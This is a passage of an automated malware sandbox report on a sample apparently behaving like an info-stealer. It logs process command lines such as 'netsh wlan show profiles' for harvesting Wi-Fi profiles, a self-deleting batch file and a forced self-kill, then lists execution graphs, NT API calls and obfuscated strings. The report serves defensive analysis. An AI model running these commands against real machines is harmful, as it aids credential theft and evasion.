                                          Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                          Imagebase:0x7e0000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7fc440000
                                          File size:875'008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7fc440000
                                          File size:875'008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                          Wow64 process (32bit):true
                                          Commandline:tasklist
                                          Imagebase:0x160000
                                          File size:79'360 bytes
                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\chcp.com
                                          Wow64 process (32bit):true
                                          Commandline:chcp 65001
                                          Imagebase:0xdf0000
                                          File size:12'800 bytes
                                          MD5 hash:41146159AA3D41A92B53ED311EE15693
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\netsh.exe
                                          Wow64 process (32bit):true
                                          Commandline:netsh wlan show profiles
                                          Imagebase:0x1220000
                                          File size:82'432 bytes
                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:15
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\findstr.exe
                                          Wow64 process (32bit):true
                                          Commandline:findstr All
                                          Imagebase:0x270000
                                          File size:29'696 bytes
                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:17
                                          Start time:02:26:21
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
                                          Imagebase:0x7e0000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:18
                                          Start time:02:26:21
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7fc440000
                                          File size:875'008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:19
                                          Start time:02:26:21
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\chcp.com
                                          Wow64 process (32bit):true
                                          Commandline:chcp 65001
                                          Imagebase:0xdf0000
                                          File size:12'800 bytes
                                          MD5 hash:41146159AA3D41A92B53ED311EE15693
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:20
                                          Start time:02:26:21
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                          Wow64 process (32bit):true
                                          Commandline:TaskKill /F /IM 8592
                                          Imagebase:0x420000
                                          File size:74'240 bytes
                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:23
                                          Start time:02:26:21
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\timeout.exe
                                          Wow64 process (32bit):true
                                          Commandline:Timeout /T 2 /Nobreak
                                          Imagebase:0x360000
                                          File size:25'088 bytes
                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:24
                                          Start time:02:26:21
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592
                                          Imagebase:0x860000
                                          File size:482'640 bytes
                                          MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:27.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:53.5%
                                            Total number of Nodes:245
                                            Total number of Limit Nodes:16
                                            execution_graph 54178 4d3c3f0 54179 4d3c408 54178->54179 54180 4d3c478 54179->54180 54183 4d3c49b 54179->54183 54193 4d3c4e9 54179->54193 54184 4d3c4c1 54183->54184 54185 4d3c52c 54183->54185 54184->54185 54190 4d3c49b 5 API calls 54184->54190 54191 4d3c4e9 5 API calls 54184->54191 54203 4d3c570 54184->54203 54207 4d3c560 54184->54207 54186 4d3c53e 54185->54186 54211 4d3e733 54185->54211 54186->54179 54187 4d3c5b3 54187->54187 54190->54185 54191->54185 54194 4d3c4c1 54193->54194 54194->54193 54196 4d3c52c 54194->54196 54199 4d3c570 5 API calls 54194->54199 54200 4d3c560 5 API calls 54194->54200 54201 4d3c49b 5 API calls 54194->54201 54202 4d3c4e9 5 API calls 54194->54202 54195 4d3c53e 54195->54179 54196->54195 54198 4d3e733 5 API calls 54196->54198 54197 4d3c5b3 54197->54197 54198->54197 54199->54196 54200->54196 54201->54196 54202->54196 54204 4d3c599 54203->54204 54206 4d3e733 5 API calls 54204->54206 54205 4d3c5b3 54205->54205 54206->54205 54208 4d3c567 54207->54208 54210 4d3e733 5 API calls 54208->54210 54209 4d3c5b3 54209->54209 54210->54209 54212 4d3e754 54211->54212 54213 4d3f398 54212->54213 54216 5dff0d0 54212->54216 54225 5dff070 54212->54225 54213->54187 54218 5dff0ec 54216->54218 54219 5dff396 CreateToolhelp32Snapshot 54218->54219 54223 5dff38c 54218->54223 54234 5dfeccc 54218->54234 54238 5dfecd8 54218->54238 54242 5dfece4 54218->54242 54221 5dff421 54219->54221 54221->54212 54223->54212 54231 5dff066 54225->54231 54226 5dfeccc CreateToolhelp32Snapshot 54226->54231 54227 5dff396 CreateToolhelp32Snapshot 54229 5dff421 54227->54229 54229->54212 54230 5dfecd8 Process32First 54230->54231 54231->54212 54231->54225 54231->54226 54231->54227 54231->54230 54232 5dff38c 54231->54232 54233 5dfece4 Process32First 54231->54233 54232->54212 54233->54231 54235 5dff3b0 CreateToolhelp32Snapshot 54234->54235 54237 5dff421 54235->54237 54237->54218 54239 5dff450 Process32First 54238->54239 54241 5dff54b 54239->54241 54243 5dff450 Process32First 54242->54243 54245 5dff54b 54243->54245 54424 4d34ab0 54425 4d34af8 NtQueryVolumeInformationFile 54424->54425 54427 4d34b36 54425->54427 54428 8257440 54429 825744d 54428->54429 54433 8257510 54429->54433 54440 8257520 54429->54440 54430 8257467 54434 8257520 54433->54434 54435 8257647 54434->54435 54436 8259673 2 API calls 54434->54436 54437 8257ead 2 API calls 54434->54437 54438 82597cc 2 API calls 54434->54438 54439 8257f78 2 API calls 54434->54439 54435->54430 54436->54434 54437->54434 54438->54434 54439->54434 54442 825752f 54440->54442 54441 8257647 54441->54430 54442->54441 54443 8259673 2 API calls 54442->54443 54444 8257ead 2 API calls 54442->54444 54445 82597cc 2 API calls 54442->54445 54446 8257f78 2 API calls 54442->54446 54443->54442 54444->54442 54445->54442 54446->54442 54447 82518cc 54448 82518da 54447->54448 54448->54447 54449 82518e8 54448->54449 54450 825b910 2 API calls 54448->54450 54452 825ba30 54448->54452 54450->54448 54453 825ba51 54452->54453 54454 825bd2c 54453->54454 54455 825c070 2 API calls 54453->54455 54455->54454 54246 4d343f8 54247 4d34443 NtAllocateVirtualMemory 54246->54247 54249 4d3448a 54247->54249 54250 4d34b78 54251 4d34bc0 NtDeviceIoControlFile 54250->54251 54253 4d34c0d 54251->54253 54258 4d34818 54259 4d34866 NtCreateSection 54258->54259 54261 4d348b3 54259->54261 54170 4d349c0 54171 4d34a0b NtMapViewOfSection 54170->54171 54173 4d34a6d 54171->54173 54174 4d34740 54175 4d3478e NtOpenFile 54174->54175 54177 4d347d8 54175->54177 54262 4d3ce00 54263 4d3ce19 54262->54263 54264 4d3d7d4 54263->54264 54265 4d3e733 5 API calls 54263->54265 54265->54263 54456 4d34320 54457 4d3436e NtProtectVirtualMemory 54456->54457 54459 4d343b8 54457->54459 54266 8257470 54267 8257490 54266->54267 54269 825749f 54266->54269 54268 82574c8 54269->54268 54273 8257f78 54269->54273 54284 8257ead 54269->54284 54270 8257508 54274 8257f8c 54273->54274 54277 82580b1 54274->54277 54278 8258584 54274->54278 54280 8257ead 2 API calls 54274->54280 54282 8257f78 2 API calls 54274->54282 54295 8259673 54274->54295 54300 82597cc 54274->54300 54275 82599c3 54275->54270 54276 8259a0a 54276->54270 54277->54270 54278->54276 54305 8259c68 54278->54305 54280->54274 54282->54274 54285 8257ebd 54284->54285 54288 8257f49 54285->54288 54289 8258584 54285->54289 54291 8259673 2 API calls 54285->54291 54292 8257ead 2 API calls 54285->54292 54293 82597cc 2 API calls 54285->54293 54294 8257f78 2 API calls 54285->54294 54286 82599c3 54286->54270 54287 8259a0a 54287->54270 54288->54270 54289->54287 54290 8259c68 2 API calls 54289->54290 54290->54286 54291->54285 54292->54285 54293->54285 54294->54285 54296 8259689 54295->54296 54296->54274 54296->54295 54297 8259a0a 54296->54297 54299 8259c68 2 API calls 54296->54299 54297->54274 54298 82599c3 54298->54274 54299->54298 54301 8259673 54300->54301 54301->54274 54303 8259a0a 54301->54303 54304 8259c68 2 API calls 54301->54304 54302 82599c3 54302->54274 54303->54274 54304->54302 54307 8259c88 54305->54307 54310 8259df6 54305->54310 54306 8259de6 54306->54275 54307->54306 54318 825b910 54307->54318 54308 8259dcb 54308->54275 54309 8259e1e 54309->54275 54310->54309 54317 8259c68 2 API calls 54310->54317 54323 85e5d50 54310->54323 54330 85e5ed5 54310->54330 54337 85e5c19 54310->54337 54344 85e5a78 54310->54344 54351 85e5a6a 54310->54351 54317->54310 54319 825b925 54318->54319 54320 825b972 54318->54320 54319->54308 54321 825b998 54320->54321 54358 825c070 54320->54358 54321->54308 54326 85e5a99 54323->54326 54324 85e6432 54324->54310 54325 85e6143 54325->54324 54327 8259c68 2 API calls 54325->54327 54326->54325 54374 4d54566 54326->54374 54382 4d54580 54326->54382 54327->54324 54333 85e5a99 54330->54333 54331 85e6432 54331->54310 54332 85e6143 54332->54331 54334 8259c68 2 API calls 54332->54334 54333->54332 54335 4d54566 2 API calls 54333->54335 54336 4d54580 2 API calls 54333->54336 54334->54331 54335->54333 54336->54333 54340 85e5a99 54337->54340 54338 85e6432 54338->54310 54339 85e6143 54339->54338 54341 8259c68 2 API calls 54339->54341 54340->54339 54342 4d54566 2 API calls 54340->54342 54343 4d54580 2 API calls 54340->54343 54341->54338 54342->54340 54343->54340 54347 85e5a99 54344->54347 54345 85e6432 54345->54310 54346 85e6143 54346->54345 54350 8259c68 2 API calls 54346->54350 54347->54346 54348 4d54566 2 API calls 54347->54348 54349 4d54580 2 API calls 54347->54349 54348->54347 54349->54347 54350->54345 54354 85e5a99 54351->54354 54352 85e6432 54352->54310 54353 85e6143 54353->54352 54357 8259c68 2 API calls 54353->54357 54354->54353 54355 4d54566 2 API calls 54354->54355 54356 4d54580 2 API calls 54354->54356 54355->54354 54356->54354 54357->54352 54359 825c08d 54358->54359 54360 825c0a1 54358->54360 54359->54360 54361 825c0c8 54359->54361 54363 825c0b4 54360->54363 54370 8257dcc 54360->54370 54364 825b910 LoadLibraryA 54361->54364 54363->54321 54369 825c0dc 54364->54369 54365 825c25c 54366 825c417 LoadLibraryA 54365->54366 54368 825c2ab 54365->54368 54367 825c456 54366->54367 54368->54321 54369->54321 54371 825c370 LoadLibraryA 54370->54371 54373 825c456 54371->54373 54376 4d5458d 54374->54376 54375 4d545c9 54375->54326 54376->54375 54377 85e5a6a 2 API calls 54376->54377 54378 85e5a78 2 API calls 54376->54378 54379 85e5c19 2 API calls 54376->54379 54380 85e5ed5 2 API calls 54376->54380 54381 85e5d50 2 API calls 54376->54381 54377->54375 54378->54375 54379->54375 54380->54375 54381->54375 54383 4d5458d 54382->54383 54384 4d545c9 54383->54384 54385 85e5a6a 2 API calls 54383->54385 54386 85e5a78 2 API calls 54383->54386 54387 85e5c19 2 API calls 54383->54387 54388 85e5ed5 2 API calls 54383->54388 54389 85e5d50 2 API calls 54383->54389 54384->54326 54385->54384 54386->54384 54387->54384 54388->54384 54389->54384 54390 5dff708 54391 5dff730 54390->54391 54392 5dff7ed 54391->54392 54396 5dff873 54391->54396 54407 5dff870 54391->54407 54414 5dff880 54391->54414 54397 5dff880 54396->54397 54399 5dff89b 54397->54399 54404 5dff873 2 API calls 54397->54404 54405 5dff880 2 API calls 54397->54405 54406 5dff870 2 API calls 54397->54406 54398 5dffb71 54398->54391 54399->54398 54400 5dffb0b 54399->54400 54401 825c070 2 API calls 54399->54401 54403 8259c68 2 API calls 54399->54403 54400->54398 54402 8259c68 2 API calls 54400->54402 54401->54399 54402->54398 54403->54399 54404->54399 54405->54399 54406->54399 54408 5dff89e 54407->54408 54409 5dffb71 54408->54409 54410 5dffb0b 54408->54410 54412 8259c68 2 API calls 54408->54412 54413 825c070 2 API calls 54408->54413 54409->54391 54410->54409 54411 8259c68 2 API calls 54410->54411 54411->54409 54412->54408 54413->54408 54416 5dff89b 54414->54416 54421 5dff873 2 API calls 54414->54421 54422 5dff880 2 API calls 54414->54422 54423 5dff870 2 API calls 54414->54423 54415 5dffb71 54415->54391 54416->54415 54417 5dffb0b 54416->54417 54418 825c070 2 API calls 54416->54418 54420 8259c68 2 API calls 54416->54420 54417->54415 54419 8259c68 2 API calls 54417->54419 54418->54416 54419->54415 54420->54416 54421->54416 54422->54416 54423->54416 54254 4d33e68 54255 4d33ea8 NtClose 54254->54255 54257 4d33ed9 54255->54257

                                            Executed Functions

                                            Function 08251A68 Relevance: 21.3, Strings: 13, Instructions: 5032COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: R5t$%W$T*6$ !?^$ CP$"Z"%$#'a$+~37$,b!l$.~#N$7*;^$TrB$VrB
                                            • API String ID: 0-1610231927
                                            • Opcode ID: 26bce7d05489258e14fb161809b38279d807ad615af4d78d9a1459c68bb3146b
                                            • Instruction ID: d4179e4ac918079f7a7b0c26a6f7b2b4751a52db2fe85d14e3452ded7412666b
                                            • Opcode Fuzzy Hash: 26bce7d05489258e14fb161809b38279d807ad615af4d78d9a1459c68bb3146b
                                            • Instruction Fuzzy Hash: 91B3DB74E006189FCB58DFA8C891A9EBBB2BF98315F1481E9D509E7354DB34AE91CF40
                                            Function 04D3E733 Relevance: 10.1, Strings: 7, Instructions: 1321COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2715 4d3e733-4d3f33a call 4d3df50 * 67 2919 4d3f340-4d3f34f 2715->2919 2920 4d3f351-4d3f396 2919->2920 2921 4d3f3a0-4d3f579 call 4d3f3b3 call 4d3df50 * 18 2919->2921 2920->2919 2924 4d3f398-4d3f39f 2920->2924 2984 4d3f57e-4d3f58e 2921->2984 2985 4d3f5b1-4d3f5fa 2984->2985 2986 4d3f590-4d3f5aa 2984->2986 2992 4d3f5fd-4d3f609 2985->2992 2986->2984 2989 4d3f5ac-4d3f5b0 2986->2989 2993 4d3fa8f-4d3faaa 2992->2993 2994 4d3f60f-4d3f618 2992->2994 2996 4d3fab0-4d3fafb 2993->2996 2997 4d3f96c-4d3f98c call 83b2748 call 8314260 2993->2997 2995 4d3f61a-4d3f62e 2994->2995 3077 4d3f634 call 4d3fc50 2995->3077 3078 4d3f634 call 4d3fc07 2995->3078 3079 4d3f634 call 4d3fc4b 2995->3079 2998 4d3fb01-4d3fb26 2996->2998 3005 4d3f992-4d3f9be 2997->3005 3002 4d3fb44-4d3fb57 2998->3002 3003 4d3fb28-4d3fb3c 2998->3003 3011 4d3fb5c-4d3fb72 3002->3011 3068 4d3fb3c call 8315841 3003->3068 3069 4d3fb3c call 8315c18 3003->3069 3070 4d3fb3c call 5df00f0 3003->3070 3071 4d3fb3c call 5df00b0 3003->3071 3005->3002 3016 4d3f9c4-4d3f9db 3005->3016 3008 4d3f63a-4d3f651 3008->3002 3010 4d3f657-4d3f6c0 call 4d505b2 3008->3010 3010->2995 3033 4d3f6c6-4d3f771 3010->3033 3014 4d3fb74-4d3fbaf 3011->3014 3015 4d3fbb8 3011->3015 3013 4d3fb42 3017 4d3fbbd-4d3fbe3 3013->3017 3014->3011 3024 4d3fbb1-4d3fbb6 3014->3024 3015->3017 3016->2998 3025 4d3f9e1-4d3f9e7 3016->3025 3017->3015 3019 4d3fbe5-4d3fbfd 3017->3019 3022 4d3fbfe-4d3fc05 3019->3022 3024->3022 3025->2997 3027 4d3f9e9-4d3fa33 3025->3027 3027->2997 3031 4d3fa39-4d3fa78 3027->3031 3031->2997 3035 4d3fa7e 3031->3035 3075 4d3f773 call 5dfdc90 3033->3075 3076 4d3f773 call 5dfdca0 3033->3076 3035->3022 3043 4d3f779-4d3f78b 3044 4d3f7a5-4d3f7bf 3043->3044 3045 4d3f7c1-4d3f7cd 3044->3045 3046 4d3f78d-4d3f793 3044->3046 3045->2995 3047 4d3f7d3-4d3f817 3045->3047 3080 4d3f799 call 5dff0d0 3046->3080 3081 4d3f799 call 5dff070 3046->3081 3051 4d3f822-4d3f83e 3047->3051 3048 4d3f79f-4d3f7a0 3048->3044 3051->2992 3052 4d3f844-4d3f903 3051->3052 3059 4d3f905-4d3f90d 3052->3059 3060 4d3f94e-4d3f969 3052->3060 3062 4d3f90f-4d3f92b 3059->3062 3063 4d3f92d-4d3f93c 3059->3063 3060->2997 3062->3063 3063->3062 3067 4d3f93e-4d3f94c 3063->3067 3067->3060 3067->3062 3068->3013 3069->3013 3070->3013 3071->3013 3075->3043 3076->3043 3077->3008 3078->3008 3079->3008 3080->3048 3081->3048
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: {a$ $!$$$$#?$%$C
                                            • API String ID: 0-657611279
                                            • Opcode ID: a98af289f9d9db145f5ddce9532b3405ce6fea16a29e3d636054884b1f3ce82a
                                            • Instruction ID: 351ec15fa15a6eaf22c6c72d9ded8c9f974a1b7bd6fae8f9fba76f1f3b6b2b95
                                            • Opcode Fuzzy Hash: a98af289f9d9db145f5ddce9532b3405ce6fea16a29e3d636054884b1f3ce82a
                                            • Instruction Fuzzy Hash: 15B2A371F001248FDB58DBA8C890B9EB7A7AF94305F1481AED50DE7384DE78AD458FA1
                                            Function 08310040 Relevance: 9.9, Strings: 6, Instructions: 2424COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509332868.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8310000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: l67$!V)$%F8U$4?>$=[ +$>76
                                            • API String ID: 0-94386722
                                            • Opcode ID: 4f6ee01243e39e52868178929abc038594865e5f7f2fc5f546408883c8e29237
                                            • Instruction ID: 0a718d3568555677a6edf914b0d3bdafdccededb2e3cb954190b3edbb5561100
                                            • Opcode Fuzzy Hash: 4f6ee01243e39e52868178929abc038594865e5f7f2fc5f546408883c8e29237
                                            • Instruction Fuzzy Hash: FF334376E116398BDB29CF18C880699B7F6BB88704F1A85E9D809F7351D7349E85CF80
                                            Function 082AC510 Relevance: 9.5, Strings: 5, Instructions: 3243COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -))P$. )V$3e&G$7f.X$8;.}
                                            • API String ID: 0-2941760644
                                            • Opcode ID: a1c2567afb6a931bab27941fc07634a3520558b0f136be0cd80d52104a37fec4
                                            • Instruction ID: 1ca2aa3b31dc82c54ac82ae32eb321313d2713a4ce12052900168b8a92d892ff
                                            • Opcode Fuzzy Hash: a1c2567afb6a931bab27941fc07634a3520558b0f136be0cd80d52104a37fec4
                                            • Instruction Fuzzy Hash: 46638176E112298FCB24CF58C980699F7F6AF88310F0A85E9D949EB351D7349E85CF84
                                            Function 082A2050 Relevance: 9.1, Strings: 5, Instructions: 2815COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$^!u$'9 $*l1Y$ethods
                                            • API String ID: 0-2952273495
                                            • Opcode ID: cd57eef527dd179edf9a6ba1407ea7b8e2ae2bf343b4a1eba9908776b8a06285
                                            • Instruction ID: 56483817b878a8a9e912f2f7d993ba6b7eaa5b0dbd6c6af2cea9f727660829fe
                                            • Opcode Fuzzy Hash: cd57eef527dd179edf9a6ba1407ea7b8e2ae2bf343b4a1eba9908776b8a06285
                                            • Instruction Fuzzy Hash: 00339176F1063A8BCB14CE69C884699B7E2BF98310F4A866ADC19EB341D774DD45CBC0
                                            Function 0825C8E8 Relevance: 8.0, Strings: 6, Instructions: 460COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4384 825c8e8-825c906 4385 825c90b-825c92c 4384->4385 4388 825c92e-825c94b 4385->4388 4390 825c94d-825c962 4388->4390 4390->4385 4392 825c964-825c982 4390->4392 4392->4385 4394 825c984-825c9cb 4392->4394 4394->4388 4397 825c9d1-825ca0c 4394->4397 4400 825ced0-825cf0b 4397->4400 4401 825ca12-825ca25 4397->4401 4406 825cf0d-825cf1b 4400->4406 4407 825cf1c 4400->4407 4401->4400 4402 825ca2b-825ca71 4401->4402 4402->4400 4412 825ca77-825ca94 4402->4412 4411 825cf21-825cf4a 4407->4411 4451 825cf4c call 825cf57 4411->4451 4452 825cf4c call 825cf68 4411->4452 4412->4400 4413 825ca9a-825caf9 4412->4413 4413->4400 4418 825caff-825cb2c 4413->4418 4414 825cf52-825cf54 4418->4400 4419 825cb32-825cb6f 4418->4419 4419->4400 4423 825cb75-825cbbf 4419->4423 4423->4400 4424 825cbc5-825cc3a 4423->4424 4424->4400 4428 825cc40-825cc63 4424->4428 4428->4400 4429 825cc69-825ccd2 4428->4429 4429->4400 4433 825ccd8-825cce8 4429->4433 4433->4400 4434 825ccee-825cd49 4433->4434 4434->4400 4438 825cd4f-825cd6e 4434->4438 4438->4400 4439 825cd74-825cde8 4438->4439 4443 825cdf7-825ce0b 4439->4443 4443->4443 4444 825ce0d-825ce1c 4443->4444 4446 825ce1e-825ce34 4444->4446 4447 825cdea-825cdf2 4444->4447 4446->4400 4447->4443 4451->4414 4452->4414
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Q+.$;f$[f$[y${\$P
                                            • API String ID: 0-1567697126
                                            • Opcode ID: 4cdb4449730107f2db708b0eb183e90b77bd43077a97f263086206f727bc5583
                                            • Instruction ID: 046eaca94b046724cf4db3b6a0eb84bc506384390ba4735878efe3af75d2b788
                                            • Opcode Fuzzy Hash: 4cdb4449730107f2db708b0eb183e90b77bd43077a97f263086206f727bc5583
                                            • Instruction Fuzzy Hash: 12F18975B502058FCB18CF68D9C095AF7E7AF88300B69C569E809DB356DB71ED46CB80
                                            Function 08310012 Relevance: 6.8, Strings: 4, Instructions: 1763COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509332868.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8310000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: l67$!V)$%F8U$>76
                                            • API String ID: 0-2735805732
                                            • Opcode ID: fd8c35a531e37c8fcc6a900cbcec98c3579f6c8e49cba48f0eefc62aed0e87a4
                                            • Instruction ID: 2e260b9356b9780e843346f37418ebfd0c2d66a0255415a73d722ddda7c3845f
                                            • Opcode Fuzzy Hash: fd8c35a531e37c8fcc6a900cbcec98c3579f6c8e49cba48f0eefc62aed0e87a4
                                            • Instruction Fuzzy Hash: 5AF25376E106398BDB29CF58CC80699B7F6AB84700F1A85E9D809FB351D7749E85CF80
                                            Function 085E0040 Relevance: 6.6, Strings: 4, Instructions: 1598COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 1%0$2B6k$d$d
                                            • API String ID: 0-582358824
                                            • Opcode ID: b8369c1d1d6ce0cf72b5bfbe18bf71536eca4e54b4f8820be6a07ffe6c82a954
                                            • Instruction ID: 1d609a764095a2705ad9e0cd1ff25f75cbaf85010039bfa69c6c7554c4f8376d
                                            • Opcode Fuzzy Hash: b8369c1d1d6ce0cf72b5bfbe18bf71536eca4e54b4f8820be6a07ffe6c82a954
                                            • Instruction Fuzzy Hash: 0FE26B76A015198FCB18CF59CD84A99B7B7BBC8311F5A82A9E409DB351DB70ED82CF40
                                            Function 05DF3A2F Relevance: 6.0, Strings: 4, Instructions: 1030COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
